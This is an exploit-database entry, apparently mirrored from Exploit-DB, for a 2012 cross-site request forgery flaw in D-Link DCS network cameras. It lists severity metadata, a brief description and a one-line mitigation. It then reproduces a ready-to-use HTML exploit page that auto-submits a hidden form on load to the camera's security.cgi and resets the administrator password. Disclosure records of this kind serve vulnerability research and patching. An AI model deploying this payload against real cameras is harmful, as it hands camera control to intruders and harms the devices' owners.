header-logo
Suggest Exploit
vendor:
DCS series
by:
rigan - imrigan [sobachka] gmail.com
7,5
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: DCS series
Affected Version From: DCS-900, DCS-2000, DCS-5300
Affected Version To: DCS-900, DCS-2000, DCS-5300
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Dlink DCS series CSRF Change Admin Password

Dlink DCS is a series of network cameras. These cameras use a web interface which is prone to CSRF vulnerabilities. This flaw allows to change the administrator password.

Mitigation:

Implementing CSRF protection on the web application and using strong passwords.
Source

Exploit-DB raw data:

Title:   Dlink DCS series CSRF Change Admin Password 
Version: DCS-900, DCS-2000, DCS-5300 and possibly other.
Date:    2012-02-22
Author:  rigan - imrigan [sobachka] gmail.com
--
Description:
Dlink DCS is a series of network cameras. These cameras use a web interface which is prone to CSRF vulnerabilities. This flaw allows to change the administrator password. 
--
Exploit:
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://your_target/setup/security.cgi">
<input type="hidden" name="rootpass" value="your_pass"/>
<input type="hidden" name="confirm" value="your_pass"/>
</form>
</body>
</html>
--

Navigation

Suggest Exploit

Services By CQR